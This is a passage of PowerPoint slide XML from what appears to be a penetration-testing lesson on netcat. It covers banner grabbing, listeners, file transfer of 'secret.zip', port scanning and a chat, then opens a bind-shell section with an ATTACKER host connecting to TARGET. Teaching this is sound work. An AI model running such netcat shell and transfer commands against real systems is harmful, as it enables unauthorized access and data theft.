                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Banner grabbing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="2624328"/>
            <a:ext cx="5029200" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nc -nv TARGET 22</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="2148840"/>
            <a:ext cx="5440680" cy="960120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428232" y="2276856"/>
            <a:ext cx="4937760" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Listening for a connection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428232" y="2624328"/>
            <a:ext cx="5029200" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nc -lvnp 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="3264408"/>
            <a:ext cx="5440680" cy="960120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="3392424"/>
            <a:ext cx="4937760" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Sending a file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="3739896"/>
            <a:ext cx="5029200" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nc -lvnp 9001 &lt; secret.zip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="3264408"/>
            <a:ext cx="5440680" cy="960120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428232" y="3392424"/>
            <a:ext cx="4937760" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Receiving a file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428232" y="3739896"/>
            <a:ext cx="5029200" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nc TARGET 9001 &gt; secret.zip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4379976"/>
            <a:ext cx="5440680" cy="960120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="4507992"/>
            <a:ext cx="4937760" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Port scanning, badly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="4855464"/>
            <a:ext cx="5029200" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nc -zv TARGET 20-25</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="4379976"/>
            <a:ext cx="5440680" cy="960120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428232" y="4507992"/>
            <a:ext cx="4937760" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A two person chat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428232" y="4855464"/>
            <a:ext cx="5029200" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nc -lvnp 5555   and   nc SERVER 5555</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="5532120"/>
            <a:ext cx="11091672" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6364"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="5715000"/>
            <a:ext cx="10515600" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The options, once and for all:  </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-l listen, -v verbose so you can see what happened, -n do not resolve names, -p the port. Say "listen verbose numeric port" a few times and you will never look it up again.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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05 / SHELLS</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Bind shell: the target listens</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41</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="11091672" cy="2697480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2373"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1828800"/>
            <a:ext cx="2743200" cy="1463040"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="701DF5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1975104"/>
            <a:ext cx="2286000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>ATTACKER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="2286000"/>
            <a:ext cx="2377440" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nc TARGET 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="2688336"/>
            <a:ext cx="2377440" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>connecting out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="1920240"/>
            <a:ext cx="777240" cy="1280160"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 11765"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2A1140"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="2148840"/>
            <a:ext cx="777240" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>FIRE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>WALL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>NAT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8549640" y="1828800"/>
            <a:ext cx="2743200" cy="1463040"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="FF6B6B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8778240" y="1975104"/>
            <a:ext cx="2286000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
